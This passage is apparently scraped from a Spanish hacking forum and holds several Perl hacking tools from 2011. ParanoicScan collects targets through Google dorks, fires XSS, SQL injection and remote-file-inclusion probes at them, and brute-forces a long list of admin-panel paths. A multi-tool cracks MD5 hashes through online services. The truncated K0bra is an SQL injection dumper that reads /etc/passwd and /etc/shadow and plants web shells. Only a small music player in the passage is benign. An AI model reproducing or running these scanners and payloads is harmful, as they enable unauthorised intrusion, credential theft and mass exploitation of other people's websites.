}}}


sub hex_en {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}
return $hex;
}

sub hex_de {
my $text = shift;
$text =~ s/^0x//;
$encode = join q[], map { chr hex } $text =~ /../g;
return $encode;
}

sub ascii_de {
my $text = shift;
$text = join q[], map { chr } split q[,],$text;
return $text;
}

sub getprocess {

my %procesos;

my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer("","root\\cimv2");

foreach my $pro (in $dos->InstancesOf("Win32_Process")){
$procesos{$pro->{Caption}} = $pro->{ProcessId};
}
return %procesos;
}

sub killprocess {

my ($numb,$pid) = @_;

if (Win32::Process::KillProcess($pid,$numb)) {
return true;
} else {
return false;
}
}

sub getip {
my $get = gethostbyname($_[0]);
return inet_ntoa($get);
}

sub crackit {

my $secret = $_[0];

print "[+] Cracking $_[0]\n\n";

my %hash = (
   
'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},   
'http://md5.hashcracking.com/search.php?md5=' =>  { 
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' =>  { 
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' =>  { 
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  { 
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' =>  { 
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);

for my $data(keys %hash) {

if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
saveyes("logs/pass-found.txt",$secret.":".$1);
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
saveyes("logs/pass-found.txt",$secret.":".$1);
}
}
}
print "\n[+] Finish\n"; 
}

sub ftp {

my ($ftp,$user,$pass) = @_;

if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {

print "\n[+] Enter of the server FTP\n\n";

menu:

print "\n\nftp>";
chomp (my $cmd = <stdin>);
print "\n\n";

if ($cmd=~/help/) {
print q(

help : show information
cd : change directory <dir>
dir : list a directory 
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory  
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>
exit : ??


);
}

if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}

if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n"; 
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/exit/ig) {
next;
}

if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/quit/) {
next;
}

goto menu;

} else {
print "\n[-] Failed the login\n\n";
}

} else {
print "\n\n[-] Error\n\n";
}



}


sub scanpaths {

my $urla = $_[0];

print "\n[+] Find paths in $urla\n\n\n";
my @urls = repes(get_links(toma($urla)));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
if ($_[0] =~/$auth/ or $auth eq "") {
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
unless ($co=~/$auth/) {
$co = $urla.$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
saveyes("logs/paths-found.txt",$co);
}}}}}}


sub scanport {

my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);


print "[+] Scanning $_[0]\n\n\n";

for my $port(keys %ports) {

if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}
print "\n\n[+] Finish\n";
}


sub scanpanel {
print "[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
saveyes("logs/panel-logs.txt",$_[0]."/".$path);
}
}
print "\n\n[+] Finish\n";
}

sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds; 
}


sub sql {

my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
saveyes("logs/sql-logs.txt",$page);
}}

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub head {
cprint "\x0311"; #13
print "\n\n-- == Project STALKER == --\n\n"; 
cprint "\x030";
}

sub copyright {
cprint "\x0311"; #13
print"\n\n(C) Doddy Hackman 2011\n\n";
cprint "\x030";
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomax {
return $nave->get($_[0]);
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}


sub conectar {

my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
Proto => "tcp",Timeout  => 5);

print $sockex $_[2]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r\n";
}


sub enter {

my ($host,$user,$pass) = @_;

print "[+] Connecting to the server\n";

$info = "dbi:mysql::".$host.":3306";
if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {

print "\n[+] Enter in the database";

while(1) {
print "\n\n\n[+] Query : ";
chomp(my $ac = <stdin>);

if ($ac eq "exit") {
$enter->disconnect;
print "\n\n[+] Closing connection\n\n";
last;
}

$re = $enter->prepare($ac);
$re->execute();
my $total = $re->rows();

my @columnas = @{$re->{NAME}};

if ($total eq "-1") {
print "\n\n[-] Query Error\n";
next;
} else {
print "\n\n[+] Result of the query\n";
if ($total eq 0) {
print "\n\n[+] Not rows returned\n\n";
} else {
print "\n\n[+] Rows returned : ".$total."\n\n\n";
for(@columnas) {
print $_."\t\t";
}
print "\n\n";
while (@row = $re->fetchrow_array) {
for(@row) {
print $_."\t\t";
}
print "\n";
}}}}
} else {
print "\n[-] Error connecting\n";
}}

sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}
return $hex;
}

sub saveyes {
open (SAVE,">>".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub coleccionar {
opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}

sub helpme {

cprint "\x0310"; #13
print qq(

Commands : 


getip <host>
getlink <page>
getprocess 
killprocess <name process> <pid process>
conec <host> <port> <command>  
allow <host>
paths <page>
encodehex <text>
decodehex <text>
encodeascii <text>
decodeascii <text>
encodebase <text>
decodebase <text>
scanport <host>
panel <page>
getpass <hash>
kobra <page>
ftp <host> <user> <pass>
mysql <host> <user> <pass>
navegator
scangoogle
help
exit
);
cprint "\x030";
}

#
#  The End ?
#

#335

Scripting / [Perl] ParanoicScan 1.0

3 Diciembre 2011, 16:32 PM

Lo mismo que la anterior version solo se le agrego
un buscado de paneladmin y una nueva opcion para buscar listado de directorios en las paginas que estamos escaneando

Código (perl) [Seleccionar]


#!usr/bin/perl
#Paranoic Scan 1.0 Updated
#(c)0ded by Doddy H 2011
#
#Search in google with a dork
#Scan type :
#
#XSS
#Full Source Discloure
#LFI
#RFI
#SQL GET & POST + admin
#Directory listing
#MSSQL
#Oracle
#Jet Database
#Find HTTP Options y Server nAME
#
#

use LWP::UserAgent;
use HTML::LinkExtor;
use HTML::Form;
use URI::Split qw(uri_split);
use IO::Socket;


my @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

installer();

sta();

sub sta {
sub head {
system 'cls';
print qq(


@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
 @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @ 
 @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @ 
 @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @ 
 @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @ 
 @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@ 
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @ 




);
}
&menu;
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op =~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
my @paginas = repes(cortar(savewords($word)));
my $option = &men;
print "\n\n[+] Opening File\n";
scan($option,@paginas);
} 
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
print "\n\n[+] Searching in google\n";
my @paginas = &google($dork,$pag);	
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
my ($option,@webs) = @_;
print "\n\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
scansql($_);
} 
if ($option=~/K/ig) {
sql($_);
} 
if ($option=~/Q/ig) {
sqladmin($_);
} 
if ($option=~/Y/ig) {
simple($_);
} 
if ($option=~/L/ig) {
lfi($_);
}
if ($option=~/R/ig) {
rfi($_);
}
if ($option=~/F/ig) {
fsd($_);
}
if ($option=~/X/ig) {
scanxss($_);
}
if ($option=~/M/ig) {
mssql($_);
}
if ($option=~/J/ig) {
access($_);
}
if ($option=~/O/ig) {
oracle($_);
}
if ($option=~/HT/ig) {
http($_);
}
if ($option=~/A/ig) {
scansql($_);
scanxss($_);
mssql($_);
access($_);
oracle($_);
lfi($_);
rfi($_);
fsd($_);
http($_);
}
}
}
print "\n\n[Status] : Finish\n";
&finish;
}
	 
sub toma {
return $nave->get($_[0])->content;
}

sub tomaz {
return $nave->get($_[0]);
}

sub savefile {
open(SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
sta();
}

sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(cortar(@founds));
return @founds; 
}

sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}

sub sqladmin {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "\n[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);

my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);

my $fage = "http://".$auth;

for $path(@panels) {
$code = tomaz($fage."/".$path);
if ($code->is_success) {
print "[+] Link : ".$fage."/".$path."\n";
savefile("admin-logs.txt",$fage."/".$path);
}}}}

sub http {

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);

my $socket = IO::Socket::INET->new(
PeerAddr=>$auth, 
PeerPort=>"80", 
Proto=>"tcp"); 

print $socket "OPTIONS  / HTTP/1.0\r\n\r\n";
read $socket,$resultado,"1000";	

if ($resultado=~/Server:(.*)/g) {
my $server = $1;

savefile("http-logs.txt","[+] Page : $auth"."\n");
savefile("http-logs.txt","[+] Server : ".$server."\n");
}
if ($resultado=~/Allow: (.*)/g) {
my $options = $1;
savefile("http-logs.txt","[+] Options : ".$options."\n");
}
$socket->close;
}

sub scanxss { 

my $page = shift;
chomp $page;

my @testar = HTML::Form->parse(toma($page),"/");
my @botones_names;
my @botones_values;
my @orden;
my @pa = ("<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>');
my @get_founds;
my @post_founds;
my @ordenuno;
my @ordendos;

my $contador_forms = 0;

my $valor = "doddyhackman";

for my $test(@testar) {
$contador_forms++;
if ($test->method eq "POST") {
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") { 
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
push(@ordenuno,$in->name,$pa[0]);
push(@ordendos,$in->name,$pa[1]);
}}

for my $n(0..int(@botones_names)-1) {
my @preuno = @ordenuno;
my @predos = @ordendos;
push(@preuno,$botones_names[$n],$botones_values[$n]);
push(@predos,$botones_names[$n],$botones_values[$n]);

my $codeuno = $nave->post($page,\@preuno)->content;
my $codedos = $nave->post($page,\@predos)->content;
if ($codeuno=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig or 
$codedos=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig) {
if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
push(@post_founds,$contador_forms);
} else {
push(@post_founds,$test->attr(name));
}}}
} else { #Fin de metodo POST
my @inputs = $test->inputs;
for my $in(@inputs) {	
if ($in->type eq "submit") { 
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
$orden.=''.$in->name.'='.$valor.'&';
}}
chop($orden);
for my $n(0..int(@botones_names)-1) {
my $partedos = "&".$botones_names[$n]."=".$botones_values[$n];
my $final = $orden.$partedos;
for my $strin(@pa) {
chomp $strin;
$final=~s/doddyhackman/$strin/;
$code = toma($page."?".$final);
my $strin = "\Q$strin\E";
if ($code=~/$strin/) {
push(@get_founds,$page."?".$final);
}}}}} 

my @get_founds = repes(@get_founds);
if (int(@get_founds) ne 0) {
for(@get_founds) {
savefile("xss-logs.txt","[+] XSS Found : $_");
print "[+] XSS Found : $_\n\a";
}}

my @post_founds = repes(@post_founds);
if (int(@post_founds) ne 0) {
for my $t(@post_founds) {
if ($t =~/^\d+$/) {
savefile("xss-logs.txt","[+] XSS : Form $t in $page");
print "[+] XSS : Form $t in $page\n\a";
}}}} 


sub simple {

my $code  = toma($_[0]);
my @links = get_links($code);

for my $com (@links) {
my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
$_[0] =~ s/$path1//ig;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
if ( $path =~ /(.*)\// ) {
my $parche = $1;                                 
unless($repetidos=~/$parche/){
$repetidos.=" ".$parche;
my $code=toma("http://".$auth.$parche);     
if ($code =~ /Index of (.*)</ig ) {
my $dir_found = $1;
chomp $dir_found;
print "[+] Directory Found : "."http://".$auth.$parche."\n";
savefile("dir-logs.txt","[+] Directory Found : "."http://".$auth.$parche);
}}}}}}

sub scansql { 

my $page = shift;
my $copia = $page;

$co = toma($page."'");

if ($co=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $co=~ /mysql_free_result/ig || $co =~ /mysql_fetch_assoc/ig ||$co =~ /mysql_num_rows/ig || $co =~ /mysql_fetch_array/ig || $co =~/mysql_fetch_assoc/ig || $co=~/mysql_query/ig || $co=~/mysql_free_result/ig || $co=~/equivocado en su sintax/ig || $co=~/You have an error in your SQL syntax/ig || $co=~/Call to undefined function/ig) {
savefile("sql-logs.txt","[+] SQL : $page");
print "[+] SQLI : $page\a\n"; 
} else {

if ($page=~/(.*)\?(.*)/) {
my $page = $1;

my @testar = HTML::Form->parse(toma($page),"/");
my @botones_names;
my @botones_values;
my @orden;
my @get_founds;
my @post_founds;
my @ordenuno;
my @ordendos;

my $contador_forms = 0;

my $valor = "doddyhackman";

for my $test(@testar) {
$contador_forms++;
if ($test->method eq "POST") {
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") { 
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
push(@ordenuno,$in->name,"'");
}}

for my $n(0..int(@botones_names)-1) {
my @preuno = @ordenuno;
push(@preuno,$botones_names[$n],$botones_values[$n]);
my $code = $nave->post($page,\@preuno)->content;
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
push(@post_founds,$contador_forms);
} else {
push(@post_founds,$test->attr(name));
}}}}

my @post_founds = repes(@post_founds);
if (int(@post_founds) ne 0) {
for my $t(@post_founds) {
if ($t =~/^\d+$/) {
savefile("sql-logs.txt","[+] SQLI : Form $t in $page");
print "[+] SQLI : Form $t in $page\n\a";
}}}}}}}

sub access {

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/Microsoft JET Database/ig or $code1=~/ODBC Microsoft Access Driver/ig) {
print "[+] Jet DB : $page\a\n";
savefile("jetdb-logs.txt",$page);
}
}

sub mssql {

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/ODBC SQL Server Driver/ig) {
print "[+] MSSQL : $page\a\n";
savefile("mssql-logs.txt",$page);
}
}

sub oracle {

my $page = shift;
$code1 = toma($page."'");
if ($code1=~/Microsoft OLE DB Provider for Oracle/ig) {
print "[+] Oracle : $page\a\n";
savefile("oracle-logs.txt",$page);
}
}

sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}

sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}

sub fsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}

sub repes {
my @limpio;
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub savewords {
open(FILE,$_[0]);
@words = <FILE>;
close FILE;
for(@words) {
push(@r,$_);
} 	
return(@r);
} 

sub men {
print "\n\n[+] Scan Type : \n\n";
print "[X] : XSS\n";
print "[S] : SQL GET/POST\n";#
print "[K] : SQL GET\n";
print "[Q] : SQL GET + Admin\n";
print "[Y] : Directory listing\n";#
print "[M] : MSSQL\n";
print "[J] : Jet Database\n";
print "[O] : Oracle\n";
print "[L] : LFI\n";
print "[R] : RFI\n";
print "[F] : Full Source Discloure\n";
print "[HT] : HTTP Information\n";
print "[A] : All\n\n";
print "\n[Options] : ";
chomp(my $option = <STDIN>);
return $option;
}

sub cortar {
my @nuevo;
for(@_) {
if ($_ =~/=/) {
@tengo = split("=",$_);
push(@nuevo,@tengo[0]."=");
} else {
push(@nuevo,$_);
}}
return @nuevo;
}

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}


sub installer {
unless (-d "logs/") {
mkdir("logs/","777");
}
}

# ¿ The End ?

#336

Scripting / [Perl] Musikeiro 0.1

3 Diciembre 2011, 16:32 PM

Un reproductor de musica que hice hace dos años en el verano.

Código (perl) [Seleccionar]


#!usr/bin/perl
#Musikeiro 0.1
#Simple music player
#Written by Doddy H in the summer of 2009
#ppm install http://www.bribes.org/perl/ppm/Win32-Console-ANSI.ppd
#ppm install http://www.bribes.org/perl/ppm/Win32-MediaPlayer.ppd

use Win32::Console::ANSI;
use Win32::MediaPlayer;

print "\n\e[;32m Bienvenido a Musikeiro\e[0m\n\n\n";

print "\e[33;45;1m Inserta la URL a reproducir: \e[0m";
chomp(my $play = <stdin>);
print "\n\e[42m Playing $play \e[0m\n";
print "\n\e[31mPresiona Control + c para detener cancion\e[0m\n\n";

$nave = new Win32::MediaPlayer;
$nave->load($play);     
$nave->play;      

while(1) { }

# The End ?

#337

Scripting / [Perl] K0bra 1.5

1 Diciembre 2011, 22:14 PM

La nueva version de mi scanner SQLi

Las funciones son las siguientes

Comprobar vulnerabilidad
Buscar numero de columnas
Buscar automaticamente el numero para mostrar datos
Mostras tablas
Mostrar columnas
Mostrar bases de datos
Mostrar tablas de otra DB
Mostrar columnas de una tabla de otra DB
Mostrar usuarios de mysql.user
Buscar archivos usando load_file
Mostrar un archivo usando load_file
Mostrar valores
Mostrar informacion sobre la DB
Crear una shell usando outfile
Todo se guarda en logs ordenados

Código (perl) [Seleccionar] Expandir
#!usr/bin/perl #k0bra 1.5 #Console version #Automatic SQL Scanner for MYSQL #(c)0ded By Doddy H system('cls'); system ("title k0bra"); my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/